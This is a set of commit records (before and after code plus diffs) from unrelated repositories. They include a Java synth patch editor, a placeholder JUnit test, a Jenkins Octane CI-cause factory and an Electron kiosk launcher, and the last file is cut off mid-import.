p2 = random.nextInt(keep.length); if (p2 != p1) break; } if (method.getSelectedIndex() == 1) { // our recombination works as follows: 50% of the time we'll do crossover with a 1/2 rate. Otherwise we'll do it with a 3/4 rate. double rate = CONSTRICT_RECOMBINATION_RATE; // recombine if (random.nextBoolean()) rate = 0.5; currentModels[replace[i]] = currentModels[keep[p1]].copy().recombine(random, currentModels[keep[p2]], keys, rate).mutate(random, keys, weight); } } // Move the new ones to the beginning Model[] old = (Model[])(currentModels.clone()); int count = 0; for(int i = 0; i < replace.length; i++) { currentModels[count++] = old[replace[i]]; } for(int i = 0; i < keep.length; i++) { currentModels[count++] = old[keep[i]]; } iterations.setName("Iteration " + stack.size()); repaint(); ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); for(int i = 0; i < NUM_CANDIDATES; i++) selected[i].setSelected(true); } void climb() { Random random = synth.random; String[] keys = synth.getMutationKeys(); double weight = blank.getModel().get("hillclimbrate", 0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end currentModels[NUM_MODELS - 1] = synth.getModel(); // What were the best models before? int[] bestModels = new int[3]; for(int j = 0; j < 3; j++) bestModels[j] = -1; // load the best models for(int i = 0; i < NUM_MODELS; i++) { for(int j = 0; j < 3; j++) { if (ratings[i][j].isSelected()) bestModels[j] = i; } } // Compact if (bestModels[1] == -1) { bestModels[1] = bestModels[2]; bestModels[2] = -1; } if (bestModels[0] == -1) { bestModels[0] = bestModels[1]; bestModels[1] = bestModels[2]; bestModels[2] = -1; } Model oldA = topStack().parents[0]; if (bestModels[0] == -1) { again(); // nothing was selected as good, so we just do a retry } else if (bestModels[1] == -1) { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], null, null }, getSelectedResults(), currentModels); produce(random, keys, CLIMB_RECOMBINATION_RATE, weight, currentModels[bestModels[0]], oldA); operation = OPERATION_CLIMB; } else if (bestModels[2] == -1) { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], currentModels[bestModels[1]], null }, getSelectedResults(), currentModels); produce(random, keys, CLIMB_RECOMBINATION_RATE, weight, currentModels[bestModels[0]], currentModels[bestModels[1]], oldA); operation = OPERATION_CLIMB; } else { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], currentModels[bestModels[1]], currentModels[bestModels[2]] }, getSelectedResults(), currentModels); produce(random, keys, CLIMB_RECOMBINATION_RATE, weight, currentModels[bestModels[0]], currentModels[bestModels[1]], currentModels[bestModels[2]], oldA); operation = OPERATION_CLIMB; } iterations.setName("Iteration " + stack.size()); repaint(); ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); for(int i = 0; i < NUM_CANDIDATES; i++) selected[i].setSelected(true); } void climbNN() { Random random = synth.random; String[] keys = synth.getMutationKeys(); double weight = blank.getModel().get("hillclimbrate", 0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end currentModels[NUM_MODELS - 1] = synth.getModel(); // What were the best models before? int[] bestModels = new int[3]; for(int j = 0; j < 3; j++) bestModels[j] = -1; // load the best models for(int i = 0; i < NUM_MODELS; i++) { for(int j = 0; j < 3; j++) { if (ratings[i][j].isSelected()) bestModels[j] = i; } } // Compact if (bestModels[1] == -1) { bestModels[1] = bestModels[2]; bestModels[2] = -1; } if (bestModels[0] == -1) { bestModels[0] = bestModels[1]; bestModels[1] = bestModels[2]; bestModels[2] = -1; } if (bestModels[0] == -1) { again(); // nothing was selected as good, so we just do a retry } else if (bestModels[1] == -1) { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], null, null }, getSelectedResults(), currentModels); produceNN(random, keys, weight, currentModels[bestModels[0]]); operation = OPERATION_CLIMB_NN; } else if (bestModels[2] == -1) { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], currentModels[bestModels[1]], null }, getSelectedResults(), currentModels); produceNN(random, keys, weight, currentModels[bestModels[0]], currentModels[bestModels[1]]); operation = OPERATION_CLIMB_NN; } else { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], currentModels[bestModels[1]], currentModels[bestModels[2]] }, getSelectedResults(), currentModels); produceNN(random, keys, weight, currentModels[bestModels[0]], currentModels[bestModels[1]], currentModels[bestModels[2]]); operation = OPERATION_CLIMB_NN; } iterations.setName("Iteration " + stack.size()); repaint(); ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); for(int i = 0; i < NUM_CANDIDATES; i++) selected[i].setSelected(true); } }
bug fixes for Librarian
edisyn/HillClimb.java
bug fixes for Librarian
<ide><path>disyn/HillClimb.java <ide> <ide> for(int i = 0; i < Math.min(len, 32); i++) <ide> { <del> currentModels[i] = (Model)(synth.librarian.getModel(row + i, column).clone()); <add> currentModels[i] = (Model)(synth.librarian.getLibrary().getModel(column - 1, row + i).clone()); <ide> } <ide> <ide> int m = len;
Java
apache-2.0
3457526688aabf35d35e160ae3ffdaddb6c22c38
0
mlvtito/padlock
package net.rwx.padlock.testapp; import static org.assertj.core.api.Assertions.assertThat; import org.junit.Test; /* * To change this license header, choose License Headers in Project Properties. * To change this template file, choose Tools | Templates * and open the template in the editor. */ /** * * @author Arnaud Fonce <[email protected]> */ public class SimpleIT { @Test public void should_BlaBlaBlaBlaBlaBlaBlaBlaBlaBla() { assertThat(false).isFalse(); } }
test/src/test/java/net/rwx/padlock/testapp/SimpleIT.java
package net.rwx.padlock.testapp; import static org.assertj.core.api.Assertions.assertThat; import org.junit.Test; /* * To change this license header, choose License Headers in Project Properties. * To change this template file, choose Tools | Templates * and open the template in the editor. */ /** * * @author Arnaud Fonce <[email protected]> */ public class SimpleIT { @Test public void should_BlaBlaBlaBlaBlaBlaBlaBlaBlaBla() { assertThat(true).isFalse(); } }
integration test with success
test/src/test/java/net/rwx/padlock/testapp/SimpleIT.java
integration test with success
<ide><path>est/src/test/java/net/rwx/padlock/testapp/SimpleIT.java <ide> <ide> @Test <ide> public void should_BlaBlaBlaBlaBlaBlaBlaBlaBlaBla() { <del> assertThat(true).isFalse(); <add> assertThat(false).isFalse(); <ide> } <ide> }
Java
mit
103114d8d4607594863e3edf06f76a68c3615314
0
HPSoftware/hpaa-octane-dev,HPSoftware/hpaa-octane-dev,HPSoftware/hpaa-octane-dev,HPSoftware/hpaa-octane-dev,HPSoftware/hpaa-octane-dev
/* * Certain versions of software and/or documents ("Material") accessible here may contain branding from * Hewlett-Packard Company (now HP Inc.) and Hewlett Packard Enterprise Company. As of September 1, 2017, * the Material is now offered by Micro Focus, a separately owned and operated company. Any reference to the HP * and Hewlett Packard Enterprise/HPE marks is historical in nature, and the HP and Hewlett Packard Enterprise/HPE * marks are the property of their respective owners. * __________________________________________________________________ * MIT License * * (c) Copyright 2012-2019 Micro Focus or one of its affiliates. * * The only warranties for products and services of Micro Focus and its affiliates * and licensors ("Micro Focus") are set forth in the express warranty statements * accompanying such products and services. Nothing herein should be construed as * constituting an additional warranty. Micro Focus shall not be liable for technical * or editorial errors or omissions contained herein. * The information contained herein is subject to change without notice. * ___________________________________________________________________ */ package com.microfocus.application.automation.tools.octane.model; import com.hp.octane.integrations.dto.DTOFactory; import com.hp.octane.integrations.dto.causes.CIEventCause; import com.hp.octane.integrations.dto.causes.CIEventCauseType; import com.microfocus.application.automation.tools.octane.configuration.SDKBasedLoggerProvider; import com.microfocus.application.automation.tools.octane.model.processors.projects.JobProcessorFactory; import com.microfocus.application.automation.tools.octane.tests.build.BuildHandlerUtils; import hudson.model.Cause; import hudson.model.InvisibleAction; import hudson.model.Run; import hudson.triggers.SCMTrigger; import hudson.triggers.TimerTrigger; import org.apache.logging.log4j.Logger; import org.jenkinsci.plugins.workflow.actions.LabelAction; import org.jenkinsci.plugins.workflow.cps.nodes.StepAtomNode; import org.jenkinsci.plugins.workflow.cps.nodes.StepEndNode; import org.jenkinsci.plugins.workflow.graph.FlowNode; import org.jenkinsci.plugins.workflow.job.WorkflowRun; import org.jenkinsci.plugins.workflow.steps.StepDescriptor; import java.io.IOException; import java.util.LinkedHashSet; import java.util.LinkedList; import java.util.List; import java.util.Set; /** * Causes Factory is a collection of static stateless methods to extract/traverse/transform causes chains of the runs * User: gullery * Date: 20/10/14 */ public final class CIEventCausesFactory { private static final Logger logger = SDKBasedLoggerProvider.getLogger(CIEventCausesFactory.class); private static final DTOFactory dtoFactory = DTOFactory.getInstance(); private CIEventCausesFactory() { } public static List<CIEventCause> processCauses(Run<?, ?> run) { if (run == null) { throw new IllegalArgumentException("run MUST NOT be null"); } List<CIEventCause> result = new LinkedList<>(); List<Cause> causes = run.getCauses(); CIEventCause tmpResultCause; Cause.UserIdCause tmpUserCause; Cause.UpstreamCause tmpUpstreamCause; for (Cause cause : causes) { tmpResultCause = dtoFactory.newDTO(CIEventCause.class); if (cause instanceof SCMTrigger.SCMTriggerCause) { tmpResultCause.setType(CIEventCauseType.SCM); result.add(tmpResultCause); } else if (cause instanceof TimerTrigger.TimerTriggerCause) { tmpResultCause.setType(CIEventCauseType.TIMER); result.add(tmpResultCause); } else if (cause instanceof Cause.UserIdCause) { tmpUserCause = (Cause.UserIdCause) cause; tmpResultCause.setType(CIEventCauseType.USER); tmpResultCause.setUser(tmpUserCause.getUserId()); result.add(tmpResultCause); } else if (cause instanceof Cause.RemoteCause) { // TODO: add support to remove cause execution in SDK/DTOs tmpResultCause.setType(CIEventCauseType.UNDEFINED); result.add(tmpResultCause); } else if (cause instanceof Cause.UpstreamCause) { tmpUpstreamCause = (Cause.UpstreamCause) cause; boolean succeededToBuildFlowCauses = false; Run upstreamRun = tmpUpstreamCause.getUpstreamRun(); if (upstreamRun != null && JobProcessorFactory.WORKFLOW_RUN_NAME.equals(upstreamRun.getClass().getName())) { // for the child of the Workflow - break aside and calculate the causes chain of the stages WorkflowRun rootWFRun = (WorkflowRun) upstreamRun; if (rootWFRun.getExecution() != null && rootWFRun.getExecution().getCurrentHeads() != null) { FlowNode enclosingNode = lookupJobEnclosingNode(run, rootWFRun); if (enclosingNode != null) { List<CIEventCause> flowCauses = processCauses(enclosingNode); result.addAll(flowCauses); succeededToBuildFlowCauses = true; } } } if (!succeededToBuildFlowCauses) { // proceed with regular UPSTREAM calculation logic as usual tmpResultCause.setType(CIEventCauseType.UPSTREAM); tmpResultCause.setProject(resolveJobCiId(tmpUpstreamCause.getUpstreamProject())); tmpResultCause.setBuildCiId(String.valueOf(tmpUpstreamCause.getUpstreamBuild())); tmpResultCause.setCauses(processCauses(upstreamRun)); result.add(tmpResultCause); } } else { tmpResultCause.setType(CIEventCauseType.UNDEFINED); result.add(tmpResultCause); } } return result; } public static List<CIEventCause> processCauses(FlowNode flowNode) { List<CIEventCause> causes = new LinkedList<>(); processCauses(flowNode, causes, new LinkedHashSet<>()); return causes; } private static void processCauses(FlowNode flowNode, List<CIEventCause> causes, Set<FlowNode> startStagesToSkip) { // we reached the start of the flow - add WorkflowRun as an initial UPSTREAM cause if (flowNode.getParents().isEmpty()) { WorkflowRun parentRun = BuildHandlerUtils.extractParentRun(flowNode); CIEventCause cause = dtoFactory.newDTO(CIEventCause.class) .setType(CIEventCauseType.UPSTREAM) .setProject(BuildHandlerUtils.getJobCiId(parentRun)) .setBuildCiId(BuildHandlerUtils.getBuildCiId(parentRun)) .setCauses(CIEventCausesFactory.processCauses((parentRun))); causes.add(cause); } // if we are calculating causes for the END STEP - exclude it's own START STEP from calculation if (BuildHandlerUtils.isStageEndNode(flowNode)) { startStagesToSkip.add(((StepEndNode) flowNode).getStartNode()); } for (FlowNode parent : flowNode.getParents()) { if (BuildHandlerUtils.isStageEndNode(parent)) { startStagesToSkip.add(((StepEndNode) parent).getStartNode()); processCauses(parent, causes, startStagesToSkip); } else if (BuildHandlerUtils.isStageStartNode(parent)) { if (!startStagesToSkip.contains(parent)) { CIEventCause cause = dtoFactory.newDTO(CIEventCause.class) .setType(CIEventCauseType.UPSTREAM) .setProject(parent.getDisplayName()) .setBuildCiId(String.valueOf(BuildHandlerUtils.extractParentRun(parent).getNumber())); causes.add(cause); processCauses(parent, cause.getCauses(), startStagesToSkip); } else { startStagesToSkip.remove(parent); processCauses(parent, causes, startStagesToSkip); } } else { processCauses(parent, causes, startStagesToSkip); } } } private static String resolveJobCiId(String jobPlainName) { if (!jobPlainName.contains(",")) { return BuildHandlerUtils.translateFolderJobName(jobPlainName); } return jobPlainName; } private static FlowNode lookupJobEnclosingNode(Run targetRun, WorkflowRun parentRun) { if (parentRun.getExecution() == null) { return null; } FlowNode result = null; OctaneParentNodeAction octaneParentNodeAction = targetRun.getAction(OctaneParentNodeAction.class); if (octaneParentNodeAction != null) { // finished event case - we do expect an action OctaneParentNodeAction to be present with the relevant info try { result = parentRun.getExecution().getNode(octaneParentNodeAction.parentFlowNodeId); } catch (IOException ioe) { logger.error("failed to extract parent flow node for " + targetRun, ioe); } } else { // started event case - we expect a strict bond here since the parent FlowNode MUST be among the current heads // the only case for potential break here is if the same JOB will be running concurrently by 2 distinct FlowNodes List<FlowNode> potentialAncestors = parentRun.getExecution().getCurrentHeads(); if (potentialAncestors != null) { for (FlowNode head : potentialAncestors) { if (head instanceof StepAtomNode && head.getAction(LabelAction.class) != null) { StepDescriptor descriptor = ((StepAtomNode) head).getDescriptor(); LabelAction labelAction = head.getAction(LabelAction.class); String label = labelAction != null ? labelAction.getDisplayName() : null; if (descriptor != null && descriptor.getId().endsWith("BuildTriggerStep") && label != null && label.endsWith(targetRun.getParent().getFullDisplayName())) { result = head; targetRun.addAction(new OctaneParentNodeAction(result.getId())); break; } } } } } return result; } private final static class OctaneParentNodeAction extends InvisibleAction { private final String parentFlowNodeId; private OctaneParentNodeAction(String parentFlowNodeId) { this.parentFlowNodeId = parentFlowNodeId; } } }
src/main/java/com/microfocus/application/automation/tools/octane/model/CIEventCausesFactory.java
/* * Certain versions of software and/or documents ("Material") accessible here may contain branding from * Hewlett-Packard Company (now HP Inc.) and Hewlett Packard Enterprise Company. As of September 1, 2017, * the Material is now offered by Micro Focus, a separately owned and operated company. Any reference to the HP * and Hewlett Packard Enterprise/HPE marks is historical in nature, and the HP and Hewlett Packard Enterprise/HPE * marks are the property of their respective owners. * __________________________________________________________________ * MIT License * * (c) Copyright 2012-2019 Micro Focus or one of its affiliates. * * The only warranties for products and services of Micro Focus and its affiliates * and licensors ("Micro Focus") are set forth in the express warranty statements * accompanying such products and services. Nothing herein should be construed as * constituting an additional warranty. Micro Focus shall not be liable for technical * or editorial errors or omissions contained herein. * The information contained herein is subject to change without notice. * ___________________________________________________________________ */ package com.microfocus.application.automation.tools.octane.model; import com.hp.octane.integrations.dto.DTOFactory; import com.hp.octane.integrations.dto.causes.CIEventCause; import com.hp.octane.integrations.dto.causes.CIEventCauseType; import com.microfocus.application.automation.tools.octane.configuration.SDKBasedLoggerProvider; import com.microfocus.application.automation.tools.octane.model.processors.projects.JobProcessorFactory; import com.microfocus.application.automation.tools.octane.tests.build.BuildHandlerUtils; import hudson.model.Cause; import hudson.model.InvisibleAction; import hudson.model.Run; import hudson.triggers.SCMTrigger; import hudson.triggers.TimerTrigger; import org.apache.logging.log4j.Logger; import org.jenkinsci.plugins.workflow.actions.LabelAction; import org.jenkinsci.plugins.workflow.cps.nodes.StepAtomNode; import org.jenkinsci.plugins.workflow.cps.nodes.StepEndNode; import org.jenkinsci.plugins.workflow.graph.FlowNode; import org.jenkinsci.plugins.workflow.job.WorkflowRun; import org.jenkinsci.plugins.workflow.steps.StepDescriptor; import java.io.IOException; import java.util.LinkedHashSet; import java.util.LinkedList; import java.util.List; import java.util.Set; /** * Causes Factory is a collection of static stateless methods to extract/traverse/transform causes chains of the runs * User: gullery * Date: 20/10/14 */ public final class CIEventCausesFactory { private static final Logger logger = SDKBasedLoggerProvider.getLogger(CIEventCausesFactory.class); private static final DTOFactory dtoFactory = DTOFactory.getInstance(); private CIEventCausesFactory() { } public static List<CIEventCause> processCauses(Run<?, ?> run) { if (run == null) { throw new IllegalArgumentException("run MUST NOT be null"); } List<CIEventCause> result = new LinkedList<>(); List<Cause> causes = run.getCauses(); CIEventCause tmpResultCause; Cause.UserIdCause tmpUserCause; Cause.UpstreamCause tmpUpstreamCause; for (Cause cause : causes) { tmpResultCause = dtoFactory.newDTO(CIEventCause.class); if (cause instanceof SCMTrigger.SCMTriggerCause) { tmpResultCause.setType(CIEventCauseType.SCM); result.add(tmpResultCause); } else if (cause instanceof TimerTrigger.TimerTriggerCause) { tmpResultCause.setType(CIEventCauseType.TIMER); result.add(tmpResultCause); } else if (cause instanceof Cause.UserIdCause) { tmpUserCause = (Cause.UserIdCause) cause; tmpResultCause.setType(CIEventCauseType.USER); tmpResultCause.setUser(tmpUserCause.getUserId()); result.add(tmpResultCause); } else if (cause instanceof Cause.RemoteCause) { // TODO: add support to remove cause execution in SDK/DTOs tmpResultCause.setType(CIEventCauseType.UNDEFINED); result.add(tmpResultCause); } else if (cause instanceof Cause.UpstreamCause) { tmpUpstreamCause = (Cause.UpstreamCause) cause; boolean succeededToBuildFlowCauses = false; Run upstreamRun = tmpUpstreamCause.getUpstreamRun(); if (upstreamRun != null && JobProcessorFactory.WORKFLOW_RUN_NAME.equals(upstreamRun.getClass().getSimpleName())) { // for the child of the Workflow - break aside and calculate the causes chain of the stages WorkflowRun rootWFRun = (WorkflowRun) upstreamRun; if (rootWFRun.getExecution() != null && rootWFRun.getExecution().getCurrentHeads() != null) { FlowNode enclosingNode = lookupJobEnclosingNode(run, rootWFRun); if (enclosingNode != null) { List<CIEventCause> flowCauses = processCauses(enclosingNode); result.addAll(flowCauses); succeededToBuildFlowCauses = true; } } } if (!succeededToBuildFlowCauses) { // proceed with regular UPSTREAM calculation logic as usual tmpResultCause.setType(CIEventCauseType.UPSTREAM); tmpResultCause.setProject(resolveJobCiId(tmpUpstreamCause.getUpstreamProject())); tmpResultCause.setBuildCiId(String.valueOf(tmpUpstreamCause.getUpstreamBuild())); tmpResultCause.setCauses(processCauses(upstreamRun)); result.add(tmpResultCause); } } else { tmpResultCause.setType(CIEventCauseType.UNDEFINED); result.add(tmpResultCause); } } return result; } public static List<CIEventCause> processCauses(FlowNode flowNode) { List<CIEventCause> causes = new LinkedList<>(); processCauses(flowNode, causes, new LinkedHashSet<>()); return causes; } private static void processCauses(FlowNode flowNode, List<CIEventCause> causes, Set<FlowNode> startStagesToSkip) { // we reached the start of the flow - add WorkflowRun as an initial UPSTREAM cause if (flowNode.getParents().isEmpty()) { WorkflowRun parentRun = BuildHandlerUtils.extractParentRun(flowNode); CIEventCause cause = dtoFactory.newDTO(CIEventCause.class) .setType(CIEventCauseType.UPSTREAM) .setProject(BuildHandlerUtils.getJobCiId(parentRun)) .setBuildCiId(BuildHandlerUtils.getBuildCiId(parentRun)) .setCauses(CIEventCausesFactory.processCauses((parentRun))); causes.add(cause); } // if we are calculating causes for the END STEP - exclude it's own START STEP from calculation if (BuildHandlerUtils.isStageEndNode(flowNode)) { startStagesToSkip.add(((StepEndNode) flowNode).getStartNode()); } for (FlowNode parent : flowNode.getParents()) { if (BuildHandlerUtils.isStageEndNode(parent)) { startStagesToSkip.add(((StepEndNode) parent).getStartNode()); processCauses(parent, causes, startStagesToSkip); } else if (BuildHandlerUtils.isStageStartNode(parent)) { if (!startStagesToSkip.contains(parent)) { CIEventCause cause = dtoFactory.newDTO(CIEventCause.class) .setType(CIEventCauseType.UPSTREAM) .setProject(parent.getDisplayName()) .setBuildCiId(String.valueOf(BuildHandlerUtils.extractParentRun(parent).getNumber())); causes.add(cause); processCauses(parent, cause.getCauses(), startStagesToSkip); } else { startStagesToSkip.remove(parent); processCauses(parent, causes, startStagesToSkip); } } else { processCauses(parent, causes, startStagesToSkip); } } } private static String resolveJobCiId(String jobPlainName) { if (!jobPlainName.contains(",")) { return BuildHandlerUtils.translateFolderJobName(jobPlainName); } return jobPlainName; } private static FlowNode lookupJobEnclosingNode(Run targetRun, WorkflowRun parentRun) { if (parentRun.getExecution() == null) { return null; } FlowNode result = null; OctaneParentNodeAction octaneParentNodeAction = targetRun.getAction(OctaneParentNodeAction.class); if (octaneParentNodeAction != null) { // finished event case - we do expect an action OctaneParentNodeAction to be present with the relevant info try { result = parentRun.getExecution().getNode(octaneParentNodeAction.parentFlowNodeId); } catch (IOException ioe) { logger.error("failed to extract parent flow node for " + targetRun, ioe); } } else { // started event case - we expect a strict bond here since the parent FlowNode MUST be among the current heads // the only case for potential break here is if the same JOB will be running concurrently by 2 distinct FlowNodes List<FlowNode> potentialAncestors = parentRun.getExecution().getCurrentHeads(); if (potentialAncestors != null) { for (FlowNode head : potentialAncestors) { if (head instanceof StepAtomNode && head.getAction(LabelAction.class) != null) { StepDescriptor descriptor = ((StepAtomNode) head).getDescriptor(); LabelAction labelAction = head.getAction(LabelAction.class); String label = labelAction != null ? labelAction.getDisplayName() : null; if (descriptor != null && descriptor.getId().endsWith("BuildTriggerStep") && label != null && label.endsWith(targetRun.getParent().getFullDisplayName())) { result = head; targetRun.addAction(new OctaneParentNodeAction(result.getId())); break; } } } } } return result; } private final static class OctaneParentNodeAction extends InvisibleAction { private final String parentFlowNodeId; private OctaneParentNodeAction(String parentFlowNodeId) { this.parentFlowNodeId = parentFlowNodeId; } } }
tech : fix for computing workflowJob
src/main/java/com/microfocus/application/automation/tools/octane/model/CIEventCausesFactory.java
tech : fix for computing workflowJob
<ide><path>rc/main/java/com/microfocus/application/automation/tools/octane/model/CIEventCausesFactory.java <ide> <ide> boolean succeededToBuildFlowCauses = false; <ide> Run upstreamRun = tmpUpstreamCause.getUpstreamRun(); <del> if (upstreamRun != null && JobProcessorFactory.WORKFLOW_RUN_NAME.equals(upstreamRun.getClass().getSimpleName())) { <add> if (upstreamRun != null && JobProcessorFactory.WORKFLOW_RUN_NAME.equals(upstreamRun.getClass().getName())) { <ide> <ide> // for the child of the Workflow - break aside and calculate the causes chain of the stages <ide> WorkflowRun rootWFRun = (WorkflowRun) upstreamRun;
JavaScript
mit
2a334de6d16fa014ed0337cd81a572af163d1530
0
scimusmn/electron-wrapper,scimusmn/electron-wrapper
// // Background // // This is main Electron process, started first thing when your app launches. // This script runs through entire life of your application. It doesn't have // any windows that you can see on screen, but we can open windows from here. // import jetpack from 'fs-jetpack'; // Base electron modules import { app, BrowserWindow, globalShortcut } from 'electron'; let childProcess = require('child_process'); let promisedExec = childProcess.exec; // Development helper for showing Chromium Dev Tools import devHelper from './vendor/electron_boilerplate/dev_helper'; // Special module holding environment variables which you declared // in config/env_xxx.json file. import env from './env'; import os from 'os'; let mainWindow; app.on('ready', function () { mainWindow = new BrowserWindow({ x: 0, y: 0, width: 800, height: 600, }); // // Hack to make full-screen kiosk mode actually work. // // There is an active bug with Electron, kiosk mode, and Yosemite. // https://github.com/atom/electron/issues/1054 // This hack makes kiosk mode actually work by waiting for the app to launch // and then issuing a call to go into kiosk mode after a few milliseconds. // if (env.name === 'production') { setTimeout(function () { mainWindow.setKiosk(true); }, 100); } // // Show dev tools when we're not in production mode // if (env.name !== 'production') { devHelper.setDevMenu(); mainWindow.openDevTools(); } // // Open the app // console.log(`This platform is ${process.platform}`); if (env.name === 'test') { mainWindow.loadURL('file://' + __dirname + '/spec.html'); } else { var configFile = ''; switch (process.platform) { case 'win32': { configFile = '/usr/local/etc/kiosk/config.json'; break; } case 'darwin': { configFile = '/usr/local/etc/kiosk/config.json'; break; } default: { configFile = '/usr/local/etc/kiosk/config.json'; } } loadWindowConfigFile(configFile); } // // Keyboard shortcuts // // Ctrl or Command + f will switch you to the Finder. // We use the "switch to Finder" approach instead of a quit, because in most // of our Electron setups we have a launchd process that will relaunch the // app on quit. For maintenance, we probably just need to be able to get // to the Finder while the application remains running in the background. // const retQuit = globalShortcut.register('CommandOrControl+F', () => { console.log('Switching to Finder'); promisedExec('open -a Finder'); }); if (!retQuit) { console.log('Quit keyboard registration failed'); } const retReload = globalShortcut.register('CommandOrControl+R', () => { console.log('Reload the page'); mainWindow.reload(); }); if (!retReload) { console.log('Reload keyboard registration failed'); } }); function loadWindowConfigFile(configFile) { const configFileObj = jetpack.read(configFile, 'json'); console.log('configFileObj: ', configFileObj); if (configFileObj !== null) { loadWindowUptimeDelay(configFileObj); } else { console.log('Config file [' + configFile + '] not present.'); mainWindow.loadURL('file://' + __dirname + '/config-error.html'); } } function loadWindowUptimeDelay(configFileObj) { // Seconds since launch, when it will be safe to load the URL const nominalUptime = 300; // Seconds to wait if we are not in the nominal uptime window const launchDelay = 60; console.log('os.uptime(): ', os.uptime()); console.log('nominalUptime: ', nominalUptime); if (os.uptime() > nominalUptime) { console.log('Launching immediately'); mainWindow.loadURL(configFileObj.url); } else { console.log('Delaying launch ' + launchDelay + ' seconds'); mainWindow.loadURL('file://' + __dirname + '/launch-delay.html'); setTimeout(function () { mainWindow.loadURL(configFileObj.url); }, launchDelay * 1000); } } app.on('window-all-closed', function () { app.quit(); });
app/background.js
// // Background // // This is main Electron process, started first thing when your app launches. // This script runs through entire life of your application. It doesn't have // any windows that you can see on screen, but we can open windows from here. // import jetpack from 'fs-jetpack'; // Base electron modules import { app, BrowserWindow, globalShortcut } from 'electron'; let childProcess = require('child_process'); let promisedExec = childProcess.exec; // Development helper for showing Chromium Dev Tools import devHelper from './vendor/electron_boilerplate/dev_helper'; // Special module holding environment variables which you declared // in config/env_xxx.json file. import env from './env'; import os from 'os'; let mainWindow; app.on('ready', function () { mainWindow = new BrowserWindow({ x: 0, y: 0, width: 800, height: 600, }); // // Hack to make full-screen kiosk mode actually work. // // There is an active bug with Electron, kiosk mode, and Yosemite. // https://github.com/atom/electron/issues/1054 // This hack makes kiosk mode actually work by waiting for the app to launch // and then issuing a call to go into kiosk mode after a few milliseconds. // if (env.name == 'production') { setTimeout(function () { mainWindow.setKiosk(true); }, 100); } // // Show dev tools when we're not in production mode // if (env.name !== 'production') { devHelper.setDevMenu(); mainWindow.openDevTools(); } // // Open the app // console.log(`This platform is ${process.platform}`); if (env.name === 'test') { mainWindow.loadURL('file://' + __dirname + '/spec.html'); } else { var configFile = ''; switch (process.platform) { case 'win32': { configFile = '/usr/local/etc/kiosk/config.json'; break; } case 'darwin': { configFile = '/usr/local/etc/kiosk/config.json'; break; } default: { configFile = '/usr/local/etc/kiosk/config.json'; } } loadWindowConfigFile(configFile); } // // Keyboard shortcuts // // Ctrl or Command + f will switch you to the Finder. // We use the "switch to Finder" approach instead of a quit, because in most // of our Electron setups we have a launchd process that will relaunch the // app on quit. For maintenance, we probably just need to be able to get // to the Finder while the application remains running in the background. // const retQuit = globalShortcut.register('CommandOrControl+F', () => { console.log('Switching to Finder'); promisedExec('open -a Finder'); }); if (!retQuit) { console.log('Quit keyboard registration failed'); } const retReload = globalShortcut.register('CommandOrControl+R', () => { console.log('Reload the page'); mainWindow.reload(); }); if (!retReload) { console.log('Reload keyboard registration failed'); } }); function loadWindowConfigFile(configFile) { const configFileObj = jetpack.read(configFile, 'json'); console.log('configFileObj: ', configFileObj); if (configFileObj !== null) { loadWindowUptimeDelay(configFileObj); } else { console.log('Config file [' + configFile + '] not present.'); mainWindow.loadURL('file://' + __dirname + '/config-error.html'); } } function loadWindowUptimeDelay(configFileObj) { // Seconds since launch, when it will be safe to load the URL const nominalUptime = 300; // Seconds to wait if we are not in the nominal uptime window const launchDelay = 60; console.log('os.uptime(): ', os.uptime()); console.log('nominalUptime: ', nominalUptime); if (os.uptime() > nominalUptime) { console.log('Launching immediately'); mainWindow.loadURL(configFileObj.url); } else { console.log('Delaying launch ' + launchDelay + ' seconds'); mainWindow.loadURL('file://' + __dirname + '/launch-delay.html'); setTimeout(function () { mainWindow.loadURL(configFileObj.url); }, launchDelay * 1000); } } app.on('window-all-closed', function () { app.quit(); });
Prevent unintended type coercion
app/background.js
Prevent unintended type coercion
<ide><path>pp/background.js <ide> // This hack makes kiosk mode actually work by waiting for the app to launch <ide> // and then issuing a call to go into kiosk mode after a few milliseconds. <ide> // <del> if (env.name == 'production') { <add> if (env.name === 'production') { <ide> setTimeout(function () { <ide> mainWindow.setKiosk(true); <ide> }, 100);
Java
agpl-3.0
d51b676ae594e9982e6cee337c58de5a3098fa0c
0
o2oa/o2oa,o2oa/o2oa,o2oa/o2oa,o2oa/o2oa,o2oa/o2oa
package com.x.processplatform.service.processing.processor.manual; import java.util.ArrayList; import java.util.Calendar; import java.util.Comparator; import java.util.Date; import java.util.LinkedHashMap; import java.util.List; import java.util.Map; import java.util.Map.Entry; import java.util.Objects; import java.util.Optional; import java.util.stream.Collectors; import javax.script.Bindings; import javax.script.ScriptContext; import org.apache.commons.collections4.ListUtils; import org.apache.commons.lang3.BooleanUtils; import org.apache.commons.lang3.ObjectUtils; import org.apache.commons.lang3.StringUtils; import org.apache.commons.lang3.time.DateUtils; import com.x.base.core.container.EntityManagerContainer; import com.x.base.core.entity.JpaObject; import com.x.base.core.project.config.Config; import com.x.base.core.project.logger.Logger; import com.x.base.core.project.logger.LoggerFactory; import com.x.base.core.project.organization.EmpowerLog; import com.x.base.core.project.script.ScriptFactory; import com.x.base.core.project.tools.DateTools; import com.x.base.core.project.tools.ListTools; import com.x.base.core.project.tools.NumberTools; import com.x.base.core.project.utils.time.WorkTime; import com.x.processplatform.core.entity.content.Read; import com.x.processplatform.core.entity.content.Task; import com.x.processplatform.core.entity.content.TaskCompleted; import com.x.processplatform.core.entity.content.Work; import com.x.processplatform.core.entity.content.WorkLog; import com.x.processplatform.core.entity.element.ActivityType; import com.x.processplatform.core.entity.element.Manual; import com.x.processplatform.core.entity.element.Route; import com.x.processplatform.core.entity.element.util.WorkLogTree; import com.x.processplatform.core.entity.element.util.WorkLogTree.Node; import com.x.processplatform.core.entity.log.Signal; import 